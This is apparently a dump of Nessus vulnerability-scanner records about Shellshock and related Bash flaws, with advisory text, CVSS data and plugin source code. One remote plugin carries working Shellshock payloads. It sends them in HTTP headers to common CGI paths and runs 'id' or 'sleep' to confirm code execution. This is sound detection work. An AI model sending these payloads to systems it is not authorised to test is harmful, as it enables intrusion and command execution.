- GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in\n the values of environment variables, which allows remote attackers to write to files or possibly have\n unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for\n CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute\n arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted\n SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0118\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-0634\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-7543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bash packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:6\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL MAIN 6.02': [\n 'bash-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debuginfo-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debugsource-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-devel-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-doc-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bash');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:52:27", "description": "The remote web server is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-04-06T00:00:00", "type": "nessus", "title": "GNU Bash Incomplete Fix Remote Code Injection (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_6278.NASL", "href": "https://www.tenable.com/plugins/nessus/82581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82581);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"GNU Bash Incomplete Fix Remote Code Injection (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for\nCVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6278\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_timeout(480);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Do not use get_http_port() here\nport = get_kb_item(\"Services/www\");\nif (!port) port = 80;\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n# Do not test broken web servers\nbroken_web = get_kb_item(\"Services/www/\" + port + \"/broken\");\n\n# Do not test CIM servers as HTTP GET requests can lead to FP situations\nif (port == get_kb_item(\"Services/cim_listener\") || broken_web)\n exit(0, 'The web server on port ' +port+ ' is broken.');\n\ncgis = make_list('/');\n\ncgis1 = get_kb_list('www/'+port+'/cgi');\nif (!isnull(cgis1)) cgis = make_list(cgis, cgis1);\n\ncgidirs = get_kb_list('www/'+port+'/content/extensions/*');\nif (!isnull(cgidirs) && !thorough_tests)\n{\n foreach dir (cgidirs)\n {\n if (preg(pattern:'^/+cgi-bin', string:dir, icase:TRUE))\n cgis = make_list(dir, cgis);\n }\n}\n\n# Add common cgi scripts\ncgis = list_uniq(make_list(cgis,\n \"/_mt/mt.cgi\",\n \"/admin.cgi\",\n \"/administrator.cgi\",\n \"/buglist.cgi\",\n \"/cgi/mid.cgi\",\n \"/cgi-bin/admin\",\n \"/cgi-bin/admin.cgi\",\n \"/cgi-bin/admin.pl\",\n \"/cgi-bin/administrator\",\n \"/cgi-bin/administrator.cgi\",\n \"/cgi-bin/agorn.cgi\",\n \"/cgi-bin/bugreport.cgi\",\n \"/cgi-bin/cart.cgi\",\n \"/cgi-bin/clwarn.cgi\",\n \"/cgi-bin/count.cgi\",\n \"/cgi-bin/Count.cgi\",\n \"/cgi-bin/faqmanager.cgi\",\n \"/cgi-bin/FormHandler.cgi\",\n \"/cgi-bin/FormMail.cgi\",\n \"/cgi-bin/guestbook.cgi\",\n \"/cgi-bin/help.cgi\",\n \"/cgi-bin/hi\",\n \"/cgi-bin/index.cgi\",\n \"/cgi-bin/index.pl\",\n \"/cgi-bin/index.sh\",\n \"/cgi-bin/login\",\n \"/cgi-bin/login.cgi\",\n \"/cgi-bin/mailit.pl\",\n \"/cgi-bin/mt/mt-check.cgi\",\n \"/cgi-bin/mt/mt-load.cgi\",\n \"/cgi-bin/mt-static/mt-check.cgi\",\n \"/cgi-bin/mt-static/mt-load.cgi\",\n \"/cgi-bin/ncbook/book.cgi\",\n \"/cgi-bin/printenv\",\n \"/cgi-bin/printenv.cgi\",\n \"/cgi-bin/quickstore.cgi\",\n \"/cgi-bin/search\",\n \"/cgi-bin/search.cgi\",\n \"/cgi-bin/search/search.cgi\",\n \"/cgi-bin/status\",\n \"/cgi-bin/status.cgi\",\n \"/cgi-bin/test.cgi\",\n \"/cgi-bin/test.sh\",\n \"/cgi-bin/test-cgi\",\n \"/cgi-bin/upload.cgi\",\n \"/cgi-bin/urlcount.cgi\",\n \"/cgi-bin/viewcvs.cgi\",\n \"/cgi-bin/wa\",\n \"/cgi-bin/wa.cgi\",\n \"/cgi-bin/wa.exe\",\n \"/cgi-bin/whois.cgi\",\n \"/cgi-bin-sdb/printenv\",\n \"/cgi-mod/index.cgi\",\n \"/cgi-sys/defaultwebpage.cgi\",\n \"/cgi-sys/entropysearch.cgi\",\n \"/index.cgi\",\n \"/index.pl\",\n \"/index.sh\",\n \"/nph-mr.cgi\",\n \"/query.cgi\",\n \"/session_login.cgi\",\n \"/show_bug.cgi\",\n \"/test\",\n \"/test.cgi\",\n \"/ucsm/isSamInstalled.cgi\",\n \"/whois.cgi\",\n \"/wp-login.php\",\n \"/wwwadmin.cgi\",\n \"/wwwboard.cgi\",\n \"/xampp/cgi.cgi\"));\n\nif (thorough_tests) exts = make_list(\"*\");\nelse exts = make_list(\"cgi\", \"php\", \"php5\", \"pl\", \"py\", \"rb\", \"sh\", \"java\", \"jsp\", \"action\", \"do\", \"shtml\");\n\nforeach ext (exts)\n{\n cgis2 = get_kb_list('www/'+port+'/content/extensions/'+ext);\n if (!isnull(cgis2)) cgis = list_uniq(make_list(cgis2, cgis));\n}\n\nif ( thorough_tests )\n headers = make_list('User-Agent', 'Referrer', 'Cookie');\nelse\n headers = make_list('User-Agent');\n\nscript = SCRIPT_NAME - \".nasl\";\nint1 = rand() % 100;\nint2 = rand() % 100;\n\n\n\nEXPLOIT_TYPE_WAIT = 0;\nEXPLOIT_TYPE_STDOUT = 1;\n\n\nexploits = make_list();\nn = 0;\n\nexploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_STDOUT,\n\t\"payload\", '() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"' + script+' Output : $((' + int1 + '+'+int2+'))\"; }',\n \t\"pattern\", script + \" Output : \" + int(int1 + int2),\n\t\"followup\", \"() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id; }\"\n\t);\nif (report_paranoia == 2)\n{\n exploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_WAIT,\n\t\"payload\", '() { _; } >_[$($())] { echo; /bin/sleep $WAITTIME; }'\n\t);\n}\n\n\nvuln = FALSE;\nWaitTime = 5;\n\nforeach cgi (cgis)\n{\nforeach exploit ( exploits )\n{\n foreach header (headers)\n {\n then = unixtime();\n\n if ( exploit[\"type\"] == EXPLOIT_TYPE_WAIT && report_paranoia == 2 )\n {\n http_set_read_timeout(WaitTime * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime), string:exploit[\"payload\"]);\n }\n else payload = exploit[\"payload\"];\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, payload),\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n # Check that we added our two random numbers and get our expected output\n # ie : int1 = 40, int2 = 65 output should be the following :\n # bash_cve_2014_6271_rce Output : 105\n if (exploit[\"type\"] == EXPLOIT_TYPE_STDOUT && exploit[\"pattern\"] >< res[2])\n {\n vuln = TRUE;\n attack_req = http_last_sent_request();\n\n match = pregmatch(pattern:\"(\"+exploit[\"pattern\"]+\")\", string:res[2]);\n if (isnull(match) || empty_or_null(match[1])) output = chomp(res[2]);\n else output = match[1];\n\n # Try and run id if our above request was a success\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, exploit[\"followup\"]),\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res2[2]))\n {\n attack_req = http_last_sent_request();\n match2 = pregmatch(pattern:\"(uid=[0-9]+.*gid=[0-9]+.*)\",string:res2[2]);\n\n if (isnull(match2) || empty_or_null(match2[1])) output = chomp(res2[2]);\n else output = match2[1];\n }\n }\n else if ( report_paranoia == 2 && exploit[\"type\"] == EXPLOIT_TYPE_WAIT && now - then >= WaitTime )\n {\n InitialDelta = now - then;\n attack_req = http_last_sent_request();\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n WaitTime1 = WaitTime;\n vuln = TRUE;\n\n # Test again with sleep set to 5, 10, and 15\n wtimes = make_list(5, 10, 15);\n\n for ( i = 0 ; i < max_index(wtimes) && vuln == TRUE; i ++ )\n {\n WaitTime1 = wtimes[i];\n http_set_read_timeout(WaitTime1 * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime1), string:exploit[\"payload\"]);\n then1 = unixtime();\n res = http_send_recv3(method : \"GET\", port : port, item : cgi, add_headers : make_array(header, payload), exit_on_fail : FALSE);\n now1 = unixtime();\n\n if ( now1 - then1 >= WaitTime1 && now1 - then1 <= (WaitTime1 + 5 ))\n {\n attack_req = http_last_sent_request();\n InitialDelta = now1 - then1;\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n continue;\n }\n else\n {\n\tvuln = FALSE;\n }\n }\n }\n if (vuln) break;\n }\n if (vuln) break;\n }\n if (vuln) break;\n}\n\n\nif (!vuln) exit(0, \"The web server listening on port \"+port+\" is not affected.\");\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 2,\n request : make_list(attack_req),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:26", "description": "An updated rhev-hypervisor6 package that fixes several security issues is now available.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product Security Incident Response Team as the original reporters of CVE-2014-1568. The CVE-2014-7186 and CVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1568", "CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1354.NASL", "href": "https://www.tenable.com/plugins/nessus/79053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1354. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79053);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-1568\",\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"RHSA\", value:\"2014:1354\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An updated rhev-hypervisor6 package that fixes several security issues\nis now available.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation\nOne) input from certain RSA signatures. A remote attacker could use\nthis flaw to forge RSA certificates by providing a specially crafted\nsignature to an application using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting\nCVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product\nSecurity Incident Response Team as the original reporters of\nCVE-2014-1568. The CVE-2014-7186 and CVE-2014-7187 issues were\ndiscovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1354\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-1568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rhev-hypervisor6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1354\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.5-20140930.1.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:34", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for bsc#898812, CVE-2014-6277: more troubles with functions bash-4.2-parse-exportfunc.patch for bsc#898884, CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch 